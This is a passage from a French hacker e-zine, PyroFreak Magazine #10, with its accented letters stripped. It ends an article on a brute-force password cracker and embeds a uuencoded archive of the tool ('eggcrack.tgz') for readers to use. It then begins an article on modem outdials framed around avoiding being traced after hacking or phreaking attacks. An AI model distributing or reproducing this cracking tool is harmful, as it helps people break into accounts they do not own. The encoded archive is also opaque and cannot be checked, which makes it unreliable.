i --> caractre 1 = 49  ==> 8


	Avec c'est 7 valeurs nous pourrions rsumer notre ancienne session de 
crack. Il nous s'agirait de mettre ces valeurs dans un fichier ( restore pour 
john the ripper ) quand nous arrtons le crackage. Une option de restauration 
pourrait permettre de lire ce fichier et de repartir le cracking avec ces 
valeurs. Je n'ai pas incorpor cette option dans mon prsent programme. 
Toutefois quelqu'un avec un peu de connaissance en C pourrait mettre les 
valeurs de son ancienne session au variable du le code. En recompilant le 
programme, il commencera sa brute force avec les nouvelles valeurs. Ce 
programme est la preuve que n'importe quel type d'encryption aussi secure 
qu'il prtend tre ne pourra tre battu par une attaque bien conu. " La 
connaissance est le pouvoir ", je ne peux m'empcher d'ajouter que " le 
coding est le pouvoir absolu ".



begin 644 eggcrack.tgz
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
%/@!X``!J
`
end



 ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
|12-Internet Outdial
|(X) Phreak (X) Hack ( ) Autres
'.__________Par LeMarquis________  ________  lemarquiz@yahoo.com ______ ___



Le modem est l'ternel compagnon de tout fanatique de hack ou phreak. C'est 
lui qui nous sert de passerelle a l'univers du binaire. La retraage de la 
source d'une quelconque attaque est intimement li avec 
modulateur-dmodulateur. Chaque appel venant de notre modem est 
scrupuleusement enregistr sur les serveurs de notre compagnie tlphonique. 
Sur le net, notre antagoniste  la recherche de notre identit physique devra 
d'abord identifier notre relle adresse IP. Et ensuite remonter par notre 
compagnie d'accs internet jusqu' notre appel modem. Le fait qu'il est 
